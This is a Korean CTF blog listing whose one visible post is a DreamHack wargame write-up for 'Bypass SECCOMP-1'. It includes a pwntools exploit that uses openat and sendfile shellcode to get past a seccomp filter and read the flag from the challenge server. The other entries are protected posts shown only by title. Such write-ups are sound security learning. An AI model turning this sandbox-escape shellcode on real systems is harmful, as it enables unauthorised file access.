목록wargame (207)
Bypass SECCOMP-1
해당 내용은 로드맵에 있는 문제로 새로운 방법을 알게 되어 포스팅을 했다. exploit code from pwn import * context.arch = 'x86_64' p = remote('host1.dreamhack.games' , 8982) shellcode = shellcraft.openat(0, "/home/bypass_syscall/flag") shellcode += shellcraft.sendfile(1, 'rax', 0, 0xffffffff) p.sendline(asm(shellcode)) p.interactive() 해당 문제는 sandbox seccomp가 걸려있다. open, write, exceve함수는 사용할 수 없다. 그래서 비슷한 함수인 openat, sendfile을 사용..
wargame/DreamHack
2022. 2. 7. 21:41
[레나 튜토리얼] 20
보호되어 있는 글입니다.
wargame/Lena
2022. 2. 7. 21:37
baseball
보호되어 있는 글입니다.
wargame/DreamHack
2022. 2. 3. 20:37
hash-bronws
보호되어 있는 글입니다.
wargame/DreamHack
2022. 2. 3. 13:06
[레나 튜토리얼] 19
보호되어 있는 글입니다.
wargame/Lena
2022. 2. 2. 19:50
tiny backdoor
보호되어 있는 글입니다.
wargame/DreamHack
2022. 2. 1. 19:40
[레나 튜토리얼] 18
보호되어 있는 글입니다.
wargame/Lena
2022. 1. 31. 17:38
[레나 튜토리얼] 17
보호되어 있는 글입니다.
wargame/Lena
2022. 1. 31. 16:18